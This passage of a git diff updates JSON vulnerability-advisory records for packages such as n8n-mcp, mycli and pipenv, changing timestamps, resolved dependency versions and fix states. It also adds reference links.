"2026-08-22T09:14:21Z", "upstream": [ "GHSA-r9mr-m37c-5fr3", "CVE-2026-73625" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.54", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-76217.json b/advisories/BREW-mistral-vibe-CVE-2026-76217.json index f8ef7e377de..28b5629af8d 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-76217.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-76217.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-76217", "published": "2026-08-20T09:17:34Z", - "modified": "2026-08-20T09:17:34Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-hh9p-6wh2-4mfc", "CVE-2026-76217" @@ -25,11 +25,11 @@ } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-76218.json b/advisories/BREW-mistral-vibe-CVE-2026-76218.json index 9ad0be3ea4d..3a7a9ed79bd 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-76218.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-76218.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-76218", "published": "2026-08-20T09:17:34Z", - "modified": "2026-08-20T09:17:34Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-9rj7-rf2p-w77r", "CVE-2026-76218" @@ -25,11 +25,11 @@ } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-76219.json b/advisories/BREW-mistral-vibe-CVE-2026-76219.json index d18972e8b1b..0a13616e688 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-76219.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-76219.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-76219", "published": "2026-08-20T09:17:34Z", - "modified": "2026-08-20T09:17:34Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-4gmw-gg2m-w46p", "CVE-2026-76219" @@ -25,11 +25,11 @@ } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-76220.json b/advisories/BREW-mistral-vibe-CVE-2026-76220.json index e20009c9cdc..442c54ec822 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-76220.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-76220.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-76220", "published": "2026-08-20T09:17:34Z", - "modified": "2026-08-20T09:17:34Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-wvpp-8hx9-p66j", "CVE-2026-76220" @@ -25,11 +25,11 @@ } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-76221.json b/advisories/BREW-mistral-vibe-CVE-2026-76221.json index 193d23cff85..20d190b5a6c 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-76221.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-76221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-76221", "published": "2026-08-20T09:17:34Z", - "modified": "2026-08-20T09:17:34Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-jm78-9fvv-mhgr", "CVE-2026-76221" @@ -25,11 +25,11 @@ } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mistral-vibe-CVE-2026-76222.json b/advisories/BREW-mistral-vibe-CVE-2026-76222.json index e7a32595d28..5ee04c5045c 100644 --- a/advisories/BREW-mistral-vibe-CVE-2026-76222.json +++ b/advisories/BREW-mistral-vibe-CVE-2026-76222.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mistral-vibe-CVE-2026-76222", "published": "2026-08-20T09:17:34Z", - "modified": "2026-08-20T09:17:34Z", + "modified": "2026-08-22T09:14:21Z", "upstream": [ "GHSA-hmq2-w58f-27jc", "CVE-2026-76222" @@ -25,11 +25,11 @@ } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.57" + "resource_purl": "pkg:pypi/gitpython@3.1.58" } } ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.57", - "key": "pkg:pypi/gitpython@3.1.57", + "subject_version": "3.1.58", + "key": "pkg:pypi/gitpython@3.1.58", "resource": "gitpython" } ] diff --git a/advisories/BREW-mycli-CVE-2023-44690.json b/advisories/BREW-mycli-CVE-2023-44690.json index 95ec2be0feb..d9c043c661d 100644 --- a/advisories/BREW-mycli-CVE-2023-44690.json +++ b/advisories/BREW-mycli-CVE-2023-44690.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mycli-CVE-2023-44690", "published": "2026-08-13T17:16:44Z", - "modified": "2026-08-17T17:34:03Z", + "modified": "2026-08-22T09:16:48Z", "upstream": [ "GHSA-v9vj-9pxv-mr2w", "CVE-2023-44690", @@ -40,15 +40,15 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mycli", - "subject_version": "2.14.0", - "key": "pkg:pypi/mycli@2.14.0" + "subject_version": "2.15.0", + "key": "pkg:pypi/mycli@2.15.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "mycli", - "subject_version": "2.14.0", - "key": "pkg:pypi/mycli@2.14.0" + "subject_version": "2.15.0", + "key": "pkg:pypi/mycli@2.15.0" }, { "strategy": "distro", @@ -60,8 +60,8 @@ "strategy": "distro", "ecosystem": "PyPI", "name": "mycli", - "subject_version": "2.14.0", - "key": "upstream:pkg:pypi/mycli@2.14.0" + "subject_version": "2.15.0", + "key": "upstream:pkg:pypi/mycli@2.15.0" }, { "strategy": "distro", diff --git a/advisories/BREW-mycli-CVE-2024-3651.json b/advisories/BREW-mycli-CVE-2024-3651.json index ed435c08438..7617031a31c 100644 --- a/advisories/BREW-mycli-CVE-2024-3651.json +++ b/advisories/BREW-mycli-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mycli-CVE-2024-3651", "published": "2026-08-13T17:16:44Z", - "modified": "2026-08-13T17:16:44Z", + "modified": "2026-08-22T09:16:48Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-mycli-CVE-2026-45409.json b/advisories/BREW-mycli-CVE-2026-45409.json index 2dc97dcdcc7..ba5ba4291d8 100644 --- a/advisories/BREW-mycli-CVE-2026-45409.json +++ b/advisories/BREW-mycli-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mycli-CVE-2026-45409", "published": "2026-08-13T17:16:44Z", - "modified": "2026-08-13T17:16:44Z", + "modified": "2026-08-22T09:16:48Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-n8n-mcp-CVE-2026-39974.json b/advisories/BREW-n8n-mcp-CVE-2026-39974.json index ee5324e5b59..01f8845a323 100644 --- a/advisories/BREW-n8n-mcp-CVE-2026-39974.json +++ b/advisories/BREW-n8n-mcp-CVE-2026-39974.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-n8n-mcp-CVE-2026-39974", "published": "2026-08-13T17:16:54Z", - "modified": "2026-08-20T09:22:07Z", + "modified": "2026-08-22T09:16:58Z", "upstream": [ "GHSA-4ggg-h7ph-26qr", "CVE-2026-39974" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "n8n-mcp", - "subject_version": "2.72.0", - "key": "pkg:npm/n8n-mcp@2.72.0" + "subject_version": "2.73.0", + "key": "pkg:npm/n8n-mcp@2.73.0" } ] }, diff --git a/advisories/BREW-n8n-mcp-CVE-2026-41495.json b/advisories/BREW-n8n-mcp-CVE-2026-41495.json index ffccb5430d8..2630f7454ab 100644 --- a/advisories/BREW-n8n-mcp-CVE-2026-41495.json +++ b/advisories/BREW-n8n-mcp-CVE-2026-41495.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-n8n-mcp-CVE-2026-41495", "published": "2026-08-13T17:16:54Z", - "modified": "2026-08-20T09:22:07Z", + "modified": "2026-08-22T09:16:58Z", "upstream": [ "GHSA-pfm2-2mhg-8wpx", "CVE-2026-41495" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "n8n-mcp", - "subject_version": "2.72.0", - "key": "pkg:npm/n8n-mcp@2.72.0" + "subject_version": "2.73.0", + "key": "pkg:npm/n8n-mcp@2.73.0" } ] }, diff --git a/advisories/BREW-n8n-mcp-CVE-2026-42282.json b/advisories/BREW-n8n-mcp-CVE-2026-42282.json index 6dc187c6bf6..2419b7ba660 100644 --- a/advisories/BREW-n8n-mcp-CVE-2026-42282.json +++ b/advisories/BREW-n8n-mcp-CVE-2026-42282.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-n8n-mcp-CVE-2026-42282", "published": "2026-08-13T17:16:54Z", - "modified": "2026-08-20T09:22:07Z", + "modified": "2026-08-22T09:16:58Z", "upstream": [ "GHSA-wg4g-395p-mqv3", "CVE-2026-42282" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "n8n-mcp", - "subject_version": "2.72.0", - "key": "pkg:npm/n8n-mcp@2.72.0" + "subject_version": "2.73.0", + "key": "pkg:npm/n8n-mcp@2.73.0" } ] }, diff --git a/advisories/BREW-n8n-mcp-CVE-2026-42449.json b/advisories/BREW-n8n-mcp-CVE-2026-42449.json index 3e329aa6da8..5c31cb2077b 100644 --- a/advisories/BREW-n8n-mcp-CVE-2026-42449.json +++ b/advisories/BREW-n8n-mcp-CVE-2026-42449.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-n8n-mcp-CVE-2026-42449", "published": "2026-08-13T17:16:54Z", - "modified": "2026-08-20T09:22:07Z", + "modified": "2026-08-22T09:16:58Z", "upstream": [ "GHSA-56c3-vfp2-5qqj", "CVE-2026-42449" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "n8n-mcp", - "subject_version": "2.72.0", - "key": "pkg:npm/n8n-mcp@2.72.0" + "subject_version": "2.73.0", + "key": "pkg:npm/n8n-mcp@2.73.0" } ] }, diff --git a/advisories/BREW-n8n-mcp-CVE-2026-44694.json b/advisories/BREW-n8n-mcp-CVE-2026-44694.json index dacc7d7aca4..ef60cfd23e4 100644 --- a/advisories/BREW-n8n-mcp-CVE-2026-44694.json +++ b/advisories/BREW-n8n-mcp-CVE-2026-44694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-n8n-mcp-CVE-2026-44694", "published": "2026-08-13T17:16:54Z", - "modified": "2026-08-20T09:22:07Z", + "modified": "2026-08-22T09:16:58Z", "upstream": [ "GHSA-cmrh-wvq6-wm9r", "CVE-2026-44694" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "n8n-mcp", - "subject_version": "2.72.0", - "key": "pkg:npm/n8n-mcp@2.72.0" + "subject_version": "2.73.0", + "key": "pkg:npm/n8n-mcp@2.73.0" } ] }, diff --git a/advisories/BREW-n8n-mcp-CVE-2026-45582.json b/advisories/BREW-n8n-mcp-CVE-2026-45582.json index 276a7e99487..d070ef2919f 100644 --- a/advisories/BREW-n8n-mcp-CVE-2026-45582.json +++ b/advisories/BREW-n8n-mcp-CVE-2026-45582.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-n8n-mcp-CVE-2026-45582", "published": "2026-08-13T17:16:54Z", - "modified": "2026-08-20T09:22:07Z", + "modified": "2026-08-22T09:16:58Z", "upstream": [ "GHSA-f3rg-xqjj-cj9w", "CVE-2026-45582" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "n8n-mcp", - "subject_version": "2.72.0", - "key": "pkg:npm/n8n-mcp@2.72.0" + "subject_version": "2.73.0", + "key": "pkg:npm/n8n-mcp@2.73.0" } ] }, diff --git a/advisories/BREW-n8n-mcp-CVE-2026-45707.json b/advisories/BREW-n8n-mcp-CVE-2026-45707.json index 5acca595f56..4435efa7f6f 100644 --- a/advisories/BREW-n8n-mcp-CVE-2026-45707.json +++ b/advisories/BREW-n8n-mcp-CVE-2026-45707.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-n8n-mcp-CVE-2026-45707", "published": "2026-08-13T17:16:54Z", - "modified": "2026-08-20T09:22:07Z", + "modified": "2026-08-22T09:16:58Z", "upstream": [ "GHSA-jxx9-px88-pj69", "CVE-2026-45707" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "n8n-mcp", - "subject_version": "2.72.0", - "key": "pkg:npm/n8n-mcp@2.72.0" + "subject_version": "2.73.0", + "key": "pkg:npm/n8n-mcp@2.73.0" } ] }, diff --git a/advisories/BREW-n8n-mcp-CVE-2026-54052.json b/advisories/BREW-n8n-mcp-CVE-2026-54052.json index ca6f7480f56..59a8328a049 100644 --- a/advisories/BREW-n8n-mcp-CVE-2026-54052.json +++ b/advisories/BREW-n8n-mcp-CVE-2026-54052.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-n8n-mcp-CVE-2026-54052", "published": "2026-08-13T17:16:54Z", - "modified": "2026-08-20T09:22:07Z", + "modified": "2026-08-22T09:16:58Z", "upstream": [ "GHSA-j6r7-6fhx-77wx", "CVE-2026-54052" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "n8n-mcp", - "subject_version": "2.72.0", - "key": "pkg:npm/n8n-mcp@2.72.0" + "subject_version": "2.73.0", + "key": "pkg:npm/n8n-mcp@2.73.0" } ] }, diff --git a/advisories/BREW-n8n-mcp-CVE-2026-55608.json b/advisories/BREW-n8n-mcp-CVE-2026-55608.json index 7ced6c9c212..646f5daf5e7 100644 --- a/advisories/BREW-n8n-mcp-CVE-2026-55608.json +++ b/advisories/BREW-n8n-mcp-CVE-2026-55608.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-n8n-mcp-CVE-2026-55608", "published": "2026-08-13T17:16:54Z", - "modified": "2026-08-20T09:22:07Z", + "modified": "2026-08-22T09:16:58Z", "upstream": [ "GHSA-2cf7-hpwf-47h9", "CVE-2026-55608" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "n8n-mcp", - "subject_version": "2.72.0", - "key": "pkg:npm/n8n-mcp@2.72.0" + "subject_version": "2.73.0", + "key": "pkg:npm/n8n-mcp@2.73.0" } ] }, diff --git a/advisories/BREW-n8n-mcp-GHSA-75hx-xj24-mqrw.json b/advisories/BREW-n8n-mcp-GHSA-75hx-xj24-mqrw.json index ba87df87c22..d2a3c839099 100644 --- a/advisories/BREW-n8n-mcp-GHSA-75hx-xj24-mqrw.json +++ b/advisories/BREW-n8n-mcp-GHSA-75hx-xj24-mqrw.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-n8n-mcp-GHSA-75hx-xj24-mqrw", "published": "2026-08-13T17:16:54Z", - "modified": "2026-08-20T09:22:07Z", + "modified": "2026-08-22T09:16:58Z", "upstream": [ "GHSA-75hx-xj24-mqrw" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "n8n-mcp", - "subject_version": "2.72.0", - "key": "pkg:npm/n8n-mcp@2.72.0" + "subject_version": "2.73.0", + "key": "pkg:npm/n8n-mcp@2.73.0" } ] }, diff --git a/advisories/BREW-n8n-mcp-GHSA-8g7g-hmwm-6rv2.json b/advisories/BREW-n8n-mcp-GHSA-8g7g-hmwm-6rv2.json index 8661d7a5d00..687025e0d73 100644 --- a/advisories/BREW-n8n-mcp-GHSA-8g7g-hmwm-6rv2.json +++ b/advisories/BREW-n8n-mcp-GHSA-8g7g-hmwm-6rv2.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-n8n-mcp-GHSA-8g7g-hmwm-6rv2", "published": "2026-08-13T17:16:54Z", - "modified": "2026-08-20T09:22:07Z", + "modified": "2026-08-22T09:16:58Z", "upstream": [ "GHSA-8g7g-hmwm-6rv2" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "n8n-mcp", - "subject_version": "2.72.0", - "key": "pkg:npm/n8n-mcp@2.72.0" + "subject_version": "2.73.0", + "key": "pkg:npm/n8n-mcp@2.73.0" } ] }, diff --git a/advisories/BREW-parsedmarc-CVE-2026-59939.json b/advisories/BREW-parsedmarc-CVE-2026-59939.json index f9185d6760e..441b184b4a3 100644 --- a/advisories/BREW-parsedmarc-CVE-2026-59939.json +++ b/advisories/BREW-parsedmarc-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-parsedmarc-CVE-2026-59939", "published": "2026-08-13T17:25:33Z", - "modified": "2026-08-13T17:25:33Z", + "modified": "2026-08-22T09:24:27Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -92,6 +92,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-pillow-CVE-2026-40192.json b/advisories/BREW-pillow-CVE-2026-40192.json index 652f291304d..1d6b94583f5 100644 --- a/advisories/BREW-pillow-CVE-2026-40192.json +++ b/advisories/BREW-pillow-CVE-2026-40192.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-40192", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-08-22T09:27:27Z", "upstream": [ "CVE-2026-40192", "BIT-pillow-2026-40192", @@ -199,6 +199,10 @@ "type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2026:37275" }, + { + "type": "ADVISORY", + "url": "https://access.redhat.com/errata/RHSA-2026:57387" + }, { "type": "ADVISORY", "url": "https://access.redhat.com/security/cve/CVE-2026-40192" diff --git a/advisories/BREW-pipenv-CVE-2011-4617.json b/advisories/BREW-pipenv-CVE-2011-4617.json index 86750b167e9..fc4f324d246 100644 --- a/advisories/BREW-pipenv-CVE-2011-4617.json +++ b/advisories/BREW-pipenv-CVE-2011-4617.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pipenv-CVE-2011-4617", "published": "2026-08-13T17:28:21Z", - "modified": "2026-08-13T17:28:21Z", + "modified": "2026-08-22T09:27:28Z", "upstream": [ "GHSA-3jhc-wjqf-5f2c", "CVE-2011-4617", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.5", "resource": "virtualenv", - "resource_purl": "pkg:pypi/virtualenv@21.7.1" + "resource_purl": "pkg:pypi/virtualenv@21.7.4" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "virtualenv", - "subject_version": "21.7.1", - "key": "pkg:pypi/virtualenv@21.7.1", + "subject_version": "21.7.4", + "key": "pkg:pypi/virtualenv@21.7.4", "resource": "virtualenv" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "virtualenv", - "subject_version": "21.7.1", - "key": "pkg:pypi/virtualenv@21.7.1", + "subject_version": "21.7.4", + "key": "pkg:pypi/virtualenv@21.7.4", "resource": "virtualenv" } ] diff --git a/advisories/BREW-pipenv-CVE-2013-1633.json b/advisories/BREW-pipenv-CVE-2013-1633.json index 703641ccb14..8621688d433 100644 --- a/advisories/BREW-pipenv-CVE-2013-1633.json +++ b/advisories/BREW-pipenv-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pipenv-CVE-2013-1633", "published": "2026-08-13T17:28:21Z", - "modified": "2026-08-13T17:28:21Z", + "modified": "2026-08-22T09:27:28Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.7", "resource": "setuptools", - "resource_purl": "pkg:pypi/setuptools@83.0.0" + "resource_purl": "pkg:pypi/setuptools@84.0.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", "resource": "setuptools" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", "resource": "setuptools" } ] diff --git a/advisories/BREW-pipenv-CVE-2022-21668.json b/advisories/BREW-pipenv-CVE-2022-21668.json index e597b5608a2..28772733c6b 100644 --- a/advisories/BREW-pipenv-CVE-2022-21668.json +++ b/advisories/BREW-pipenv-CVE-2022-21668.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pipenv-CVE-2022-21668", "published": "2026-08-13T17:28:21Z", - "modified": "2026-08-13T17:28:21Z", + "modified": "2026-08-22T09:27:28Z", "upstream": [ "CVE-2022-21668", "GHSA-qc9x-gjcv-465w", @@ -44,29 +44,29 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/pypa/pipenv", - "subject_version": "2026.7.1", + "subject_version": "2026.8.0", "key": "https://github.com/pypa/pipenv" }, { "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/pypa/pipenv", - "subject_version": "2026.7.1", + "subject_version": "2026.8.0", "key": "https://github.com/pypa/pipenv" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pipenv", - "subject_version": "2026.7.1", - "key": "pkg:pypi/pipenv@2026.7.1" + "subject_version": "2026.8.0", + "key": "pkg:pypi/pipenv@2026.8.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pipenv", - "subject_version": "2026.7.1", - "key": "pkg:pypi/pipenv@2026.7.1" + "subject_version": "2026.8.0", + "key": "pkg:pypi/pipenv@2026.8.0" }, { "strategy": "distro", @@ -78,15 +78,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/pypa/pipenv", - "subject_version": "2026.7.1", + "subject_version": "2026.8.0", "key": "upstream:https://github.com/pypa/pipenv" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "pipenv", - "subject_version": "2026.7.1", - "key": "upstream:pkg:pypi/pipenv@2026.7.1" + "subject_version": "2026.8.0", + "key": "upstream:pkg:pypi/pipenv@2026.8.0" } ] }, diff --git a/advisories/BREW-pipenv-CVE-2022-40897.json b/advisories/BREW-pipenv-CVE-2022-40897.json index fedb6d8902e..83a77abedd0 100644 --- a/advisories/BREW-pipenv-CVE-2022-40897.json +++ b/advisories/BREW-pipenv-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pipenv-CVE-2022-40897", "published": "2026-08-13T17:28:21Z", - "modified": "2026-08-13T17:28:21Z", + "modified": "2026-08-22T09:27:28Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "65.5.1", "resource": "setuptools", - "resource_purl": "pkg:pypi/setuptools@83.0.0" + "resource_purl": "pkg:pypi/setuptools@84.0.0" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", "resource": "setuptools" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", "resource": "setuptools" } ] diff --git a/advisories/BREW-pipenv-CVE-2024-53899.json b/advisories/BREW-pipenv-CVE-2024-53899.json index 67f34780b67..0b3f399dd3c 100644 --- a/advisories/BREW-pipenv-CVE-2024-53899.json +++ b/advisories/BREW-pipenv-CVE-2024-53899.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pipenv-CVE-2024-53899", "published": "2026-08-13T17:28:21Z", - "modified": "2026-08-13T17:28:21Z", + "modified": "2026-08-22T09:27:28Z", "upstream": [ "GHSA-rqc4-2hc7-8c8v", "BIT-virtualenv-2024-53899", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "20.26.6", "resource": "virtualenv", - "resource_purl": "pkg:pypi/virtualenv@21.7.1" + "resource_purl": "pkg:pypi/virtualenv@21.7.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "virtualenv", - "subject_version": "21.7.1", - "key": "pkg:pypi/virtualenv@21.7.1", + "subject_version": "21.7.4", + "key": "pkg:pypi/virtualenv@21.7.4", "resource": "virtualenv" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "virtualenv", - "subject_version": "21.7.1", - "key": "pkg:pypi/virtualenv@21.7.1", + "subject_version": "21.7.4", + "key": "pkg:pypi/virtualenv@21.7.4", "resource": 